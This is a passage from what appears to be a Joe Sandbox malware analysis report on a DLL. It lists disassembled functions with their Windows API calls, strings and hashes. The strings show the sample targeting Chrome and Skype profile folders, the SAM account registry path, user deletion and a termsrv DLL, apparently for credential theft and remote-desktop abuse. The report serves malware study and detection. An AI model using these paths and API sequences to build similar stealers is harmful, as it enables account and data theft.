                                                            • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE52
                                                          • #800.MFC42 ref: 1000EEAD
                                                          • #800.MFC42 ref: 1000EEC1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$#800$Process32Tidy@?$basic_string@$#4202#537#5572FirstNext$#540#924#926?append@?$basic_string@CreateD@2@@0@Eos@?$basic_string@FileFindFolderFreeze@?$basic_string@Grow@?$basic_string@Hstd@@PathSleepSnapshotSpecialToolhelp32V10@V12@V?$basic_string@Xran@std@@
                                                          • String ID: C:\Users\$\AppData\Local\Google\Chrome\User Data\Default$chrome.exe
                                                          • API String ID: 1983172782-2559963756
                                                          • Opcode ID: 523ad62f1040f6ae26f22e01937fcab8022a47d8d2344defdecc7f28f5186ab4
                                                          • Instruction ID: 8c6a82a66adb9de8b1ca2427e2dad7b5aad7125b1f470a43c445caaf05036487
                                                          • Opcode Fuzzy Hash: 523ad62f1040f6ae26f22e01937fcab8022a47d8d2344defdecc7f28f5186ab4
                                                          • Instruction Fuzzy Hash: 1D216579408784ABE254DB54DD46FDEB7D5EB84700F40891CF19D821D6EB74A504CBA3
                                                          Function 1000EEE0 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 61sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #537.MFC42(Skype.exe), ref: 1000EF07
                                                            • Part of subcall function 1000BBB0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
                                                            • Part of subcall function 1000BBB0: Process32First.KERNEL32(00000000), ref: 1000BBEF
                                                            • Part of subcall function 1000BBB0: #4202.MFC42(00000000), ref: 1000BC03
                                                            • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC0E
                                                            • Part of subcall function 1000BBB0: #537.MFC42(?,00000000,00000000,00000000), ref: 1000BC24
                                                            • Part of subcall function 1000BBB0: #4202.MFC42 ref: 1000BC35
                                                            • Part of subcall function 1000BBB0: #5572.MFC42(000000FF), ref: 1000BC78
                                                            • Part of subcall function 1000BBB0: #800.MFC42(000000FF), ref: 1000BC88
                                                            • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC93
                                                            • Part of subcall function 1000BBB0: #5572.MFC42(000000FF,00000000,00000000,00000000), ref: 1000BCA9
                                                            • Part of subcall function 1000BBB0: #800.MFC42 ref: 1000BCC0
                                                          • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 1000EF1F
                                                          • #540.MFC42 ref: 1000EF29
                                                          • #926.MFC42(00000002,C:\Users\,0000005C), ref: 1000EF5B
                                                          • #924.MFC42(0000005C,00000000,\AppData\Roaming\Microsoft\Skype for Desktop,00000002,C:\Users\,0000005C), ref: 1000EF73
                                                          • #800.MFC42(0000005C,00000000,\AppData\Roaming\Microsoft\Skype for Desktop,00000002,C:\Users\,0000005C), ref: 1000EF84
                                                          • Sleep.KERNEL32(000003E8,0000005C,00000000,\AppData\Roaming\Microsoft\Skype for Desktop,00000002,C:\Users\,0000005C), ref: 1000EF8E
                                                            • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 1000BD7E
                                                            • Part of subcall function 1000BD50: ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1000BDA0
                                                            • Part of subcall function 1000BD50: ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001), ref: 1000BDC3
                                                            • Part of subcall function 1000BD50: ?_Xran@std@@YAXXZ.MSVCP60(?,00000001), ref: 1000BDDB
                                                            • Part of subcall function 1000BD50: ?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ.MSVCP60(?,00000001), ref: 1000BDE5
                                                            • Part of subcall function 1000BD50: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z.MSVCP60(00000001,0000005C,?,00000001), ref: 1000BDFD
                                                            • Part of subcall function 1000BD50: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000001,*.*,?,00000001), ref: 1000BE12
                                                            • Part of subcall function 1000BD50: FindFirstFileA.KERNEL32(?,?), ref: 1000BE2C
                                                            • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE3A
                                                            • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE52
                                                          • #800.MFC42 ref: 1000EFAD
                                                          • #800.MFC42 ref: 1000EFC1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$#800$Process32Tidy@?$basic_string@$#4202#537#5572FirstNext$#540#924#926?append@?$basic_string@CreateD@2@@0@Eos@?$basic_string@FileFindFolderFreeze@?$basic_string@Grow@?$basic_string@Hstd@@PathSleepSnapshotSpecialToolhelp32V10@V12@V?$basic_string@Xran@std@@
                                                          • String ID: C:\Users\$Skype.exe$\AppData\Roaming\Microsoft\Skype for Desktop
                                                          • API String ID: 1983172782-3499480952
                                                          • Opcode ID: 506967efb7cbd1429561d61a16553b74a6b62e0af240bad732d850845aeece2a
                                                          • Instruction ID: c2392c766fec2091ac0e11c8610587f68406746635502bb5fb4463dc87aa9c62
                                                          • Opcode Fuzzy Hash: 506967efb7cbd1429561d61a16553b74a6b62e0af240bad732d850845aeece2a
                                                          • Instruction Fuzzy Hash: 0B216579408788ABE254DB54D942FDEB7D4EB84700F40891CF19D821D6EB74A504CBA3
                                                          Function 10018D40 Relevance: 19.6, APIs: 13, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Delete$#825$Object$CursorDestroyRelease
                                                          • String ID:
                                                          • API String ID: 719826280-0
                                                          • Opcode ID: 2d077890a14f4d6575af65d40687cd70d6d7c34bba1e1dc241cd46e0adb5d077
                                                          • Instruction ID: 1057cd0b5374723fdd9eac028f866a029913c2518dbccd866ad41eb7240ccfe0
                                                          • Opcode Fuzzy Hash: 2d077890a14f4d6575af65d40687cd70d6d7c34bba1e1dc241cd46e0adb5d077
                                                          • Instruction Fuzzy Hash: 83114FBA600B149BD620EBB9DC80D57F3EDFF98210B154D1DFA8A87750DAB5F8448B60
                                                          Function 100074F0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 166filememoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • malloc.MSVCRT ref: 10007519
                                                          • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000), ref: 10007541
                                                          • free.MSVCRT ref: 1000759F
                                                          • GetFileAttributesA.KERNEL32(?), ref: 100075AD
                                                          • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 100075D4
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 100075E3
                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 100075F9
                                                          • ReadFile.KERNEL32(?,00000000,?,0000035D,00000000), ref: 1000761D
                                                          • CloseHandle.KERNEL32(?), ref: 1000762A
                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 1000766A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Virtual$AllocAttributesCloseCreateFolderFreeHandlePathReadSizeSpecialfreemalloc
                                                          • String ID: Main
                                                          • API String ID: 2820283417-521822810
                                                          • Opcode ID: 13776bcad715608dff0506f2e30abc6ad8c9195b9db0b12638408b4caa4561db
                                                          • Instruction ID: bdf9819eaa4e7debe0beb33892044917b998e779a9669e77957c816ab1e879f9
                                                          • Opcode Fuzzy Hash: 13776bcad715608dff0506f2e30abc6ad8c9195b9db0b12638408b4caa4561db
                                                          • Instruction Fuzzy Hash: 1451E8756002005BE718DB388C99FAB3699FB84720F184739FE1ADB2D5DE79A904C764
                                                          Function 1001A8F0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 94stringfilenetworkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 10014700: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA,?,?,0000005C), ref: 10014730
                                                            • Part of subcall function 10014700: GetProcAddress.KERNEL32(00000000), ref: 10014737
                                                            • Part of subcall function 10014700: #823.MFC42(?), ref: 10014763
                                                            • Part of subcall function 10014700: #823.MFC42(?,?), ref: 100147DA
                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,771B23A0), ref: 1001A98A
                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,?,00000000,771B23A0), ref: 1001A9C4
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,771B23A0), ref: 1001A9D4
                                                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,00000000,771B23A0), ref: 1001A9E4
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,771B23A0), ref: 1001A9EB
                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,771B23A0), ref: 1001A9F8
                                                          • gethostname.WS2_32(?,?), ref: 1001AA00
                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,771B23A0), ref: 1001AA07
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Filelstrlen$#823$AddressCloseCreateHandleLibraryLoadProcReadSizegethostname
                                                          • String ID: C:\ProgramData\Microsoft Drive\Host.sys$Host$TGByte\Setup
                                                          • API String ID: 1105965372-3579490797
                                                          • Opcode ID: 26600dc6ced3552f7cb32c9401563bb8fc38f089117c6e8a29bd790fcd37870b
                                                          • Instruction ID: 1aca79b18ebe77987ab2057df5d6393e57785d9c54ea4be51680de8087f9014e
                                                          • Opcode Fuzzy Hash: 26600dc6ced3552f7cb32c9401563bb8fc38f089117c6e8a29bd790fcd37870b
                                                          • Instruction Fuzzy Hash: B331D675604754AFE320CB28CC90FEB7799FB89340F040929FA49A7290DA316945CF62
                                                          Function 10026D20 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 69stringmemorylibraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • wsprintfA.USER32 ref: 10026D35
                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10026D4B
                                                          • lstrcatA.KERNEL32(?,?), ref: 10026D5E
                                                          • LocalAlloc.KERNEL32(00000040,00000400), ref: 10026D6B
                                                          • GetFileAttributesA.KERNEL32(?), ref: 10026D7B
                                                          • LoadLibraryA.KERNEL32(?), ref: 10026D8E
                                                          • lstrlenA.KERNEL32(?,?,?,771B0F00), ref: 10026DA9
                                                          • lstrlenA.KERNEL32(?,?,771B0F00), ref: 10026DC9
                                                          • LocalReAlloc.KERNEL32(00000000,00000003,00000042,?,771B0F00), ref: 10026DD3
                                                          • LocalFree.KERNEL32(00000000,?,771B0F00), ref: 10026DE7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Local$Alloclstrlen$AttributesDirectoryFileFreeLibraryLoadSystemlstrcatwsprintf
                                                          • String ID: \termsrv_t.dll
                                                          • API String ID: 2807520882-1337493607
                                                          • Opcode ID: c29be6d71f4e1c5f9d6bfc8c749e4c27b7b64770f87dbed75690b64cd3501d5c
                                                          • Instruction ID: 65923665598b0d5bc9376def11d9c452954a14e2149ef0656fb128811b96f142
                                                          • Opcode Fuzzy Hash: c29be6d71f4e1c5f9d6bfc8c749e4c27b7b64770f87dbed75690b64cd3501d5c
                                                          • Instruction Fuzzy Hash: 3B21D176100306AFD724DB60DC88EEB77A8FB85310F448E18FA4A97191EB70E509CB62
                                                          Function 100232E0 Relevance: 18.2, APIs: 12, Instructions: 200networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: inet_ntoa$htons$inet_addr
                                                          • String ID:
                                                          • API String ID: 2325850693-0
                                                          • Opcode ID: feff4991006adee928c6db238b0ff46cf5f451b3ea962ecf4bc5810bc883adaf
                                                          • Instruction ID: 0f8a403a37a04198fb3543f642c4371480fab305af7d543d8c9d6285c61f0e9b
                                                          • Opcode Fuzzy Hash: feff4991006adee928c6db238b0ff46cf5f451b3ea962ecf4bc5810bc883adaf
                                                          • Instruction Fuzzy Hash: 6051493A7046544BCB18DF38B8901AFB7D1FF89260B9985AEFD8AD7341CA21ED01C764
                                                          Function 1000BA50 Relevance: 18.1, APIs: 12, Instructions: 75processstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BA5E
                                                          • Process32First.KERNEL32(00000000,?), ref: 1000BA73
                                                          • GetLastError.KERNEL32(00000000,?), ref: 1000BA80
                                                          • _wcsupr.MSVCRT ref: 1000BA9D
                                                          • _wcsupr.MSVCRT ref: 1000BAA6
                                                          • wcsstr.MSVCRT ref: 1000BAAA
                                                          • Process32Next.KERNEL32(00000000,?), ref: 1000BACD
                                                          • _strlwr.MSVCRT ref: 1000BAE7
                                                          • _strlwr.MSVCRT ref: 1000BAEA
                                                          • strstr.MSVCRT ref: 1000BAF2
                                                          • Process32Next.KERNEL32(00000000,?), ref: 1000BB01
                                                          • CloseHandle.KERNEL32(00000000,00000000,?), ref: 1000BB0B
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process32$Next_strlwr_wcsupr$CloseCreateErrorFirstHandleLastSnapshotToolhelp32strstrwcsstr
                                                          • String ID:
                                                          • API String ID: 146143966-0
                                                          • Opcode ID: 479f2f72a704a3b5c2289d2de251190d7c82cc186dc092ac8778594daa37f946
                                                          • Instruction ID: 58f6ba2257750e6ab45c168541484ccfaec70cf465e469f9539c8ec9d4fa11c7
                                                          • Opcode Fuzzy Hash: 479f2f72a704a3b5c2289d2de251190d7c82cc186dc092ac8778594daa37f946
                                                          • Instruction Fuzzy Hash: 6D11B6762003156BF350EBB59C85EEB7B9CEFC1390F850929FD05C2145EB39E90886B1
                                                          Function 10025C20 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 102registrysleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NetUserDel.NETAPI32(00000000,00000000), ref: 10025C48
                                                          • #825.MFC42(00000000,00000000,00000000), ref: 10025C50
                                                          • wsprintfA.USER32 ref: 10025C98
                                                          • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 10025CB8
                                                          • Sleep.KERNEL32(00000032), ref: 10025CC4
                                                          • RegQueryValueExA.ADVAPI32 ref: 10025CF1
                                                          • RegCloseKey.ADVAPI32(1012B044), ref: 10025CFC
                                                          • wsprintfA.USER32 ref: 10025D11
                                                            • Part of subcall function 10025700: LocalSize.KERNEL32(00000000), ref: 10025710
                                                            • Part of subcall function 10025700: LocalFree.KERNEL32(00000000,?,10025C00,00000001,?,00000000,00000001,?,?), ref: 10025720
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Localwsprintf$#825CloseFreeOpenQuerySizeSleepUserValue
                                                          • String ID: %08X$SAM\SAM\Domains\Account\Users\Names\%s
                                                          • API String ID: 2119749478-1111274145
                                                          • Opcode ID: b01912df1a0d1f8e6f5d4f2d64c2b0e34237368b2916a4d310cc0862af80d056
                                                          • Instruction ID: 7d074f82118bbd200c174c2c7089e418c148b78a36223b64fb6bb0d76c55cb0a
                                                          • Opcode Fuzzy Hash: b01912df1a0d1f8e6f5d4f2d64c2b0e34237368b2916a4d310cc0862af80d056
                                                          • Instruction Fuzzy Hash: 9931F8752043056FE210DB24EC85FAB77ECEBC5255F80092DF94692282EA76ED0C8767
                                                          Function 1000B620 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 102filestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000B634
                                                          • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 1000B6A9
                                                          • GetFileSize.KERNEL32 ref: 1000B6BC
                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 1000B6D0
                                                          • lstrlenA.KERNEL32(?), ref: 1000B6DE
                                                          • #823.MFC42(00000000), ref: 1000B6E7
                                                          • lstrlenA.KERNEL32(?,?,00000000), ref: 1000B70D
                                                          • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 1000B716
                                                          • CloseHandle.KERNEL32(00000000), ref: 1000B71D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
